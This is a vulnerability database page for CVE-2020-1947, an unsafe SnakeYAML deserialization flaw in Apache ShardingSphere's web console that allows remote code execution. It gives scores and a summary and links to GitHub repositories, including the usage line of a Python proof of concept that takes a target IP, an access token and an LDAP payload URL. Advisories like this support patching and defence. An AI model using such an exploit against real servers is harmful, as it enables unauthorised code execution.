7.5
CVSSv2

CVE-2020-1947

Published: 11/03/2020 Updated: 13/03/2020
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 668
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

In Apache ShardingSphere(incubator) 4.0.0-RC3 and 4.0.0, the ShardingSphere's web console uses the SnakeYAML library for parsing YAML inputs to load datasource configuration. SnakeYAML allows to unmarshal data to a Java type By using the YAML tag. Unmarshalling untrusted data can lead to security flaws of RCE.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

apache shardingsphere 4.0.0

Github Repositories

CVE-2020-1947 Python POC

CVE-2020-1947 usage: CVE-2020-1947py [-h] -i IP -p PORT -T ACCESS_TOKEN -poc POC python CVE-2020-1947py -i 192168128135 -p 8088 -T eyJ1c2VybmFtZSI6ImFk******* -poc ldap://127001:1389/CommandObject

Hi there 👋 About Me 🐼 前奇安信某实验室成员 🐱 擅长代码审计 java/go/python 🐶 CVE-2020-1947(Apache ShardingShpere RCE) CVE-2020-1952(Apache IotDb RCE) CVE-2020-11974(Apache DolphinScheduler RCE) CVE-2021-37580(Apache ShenYu Auth Bypass) 🐻 目前就职于甲方安全建设与安全开发 🐒 时不时写点文章或者一些工具

CVE-2020-1947 ApacheShardingShpereUIYAML解析远程代码执行漏洞复现及分析 概述 shardingsphere是apache的一套开源生态系统,是一组分布式数据库中间件解决方案,是由sharding-jdbc、sharding-proxy和sharding-sidecar三款相互独立的框架组成,被用来提供数据分片,分布式事务,数据库治理 受影响版本 ShardingSphe

Apache ShardingSphere UI YAML解析远程代码执行漏洞

CVE-2020-1947 Apache ShardingSphere UI YAML解析远程代码执行漏洞复现 0x01 下载shardingsphe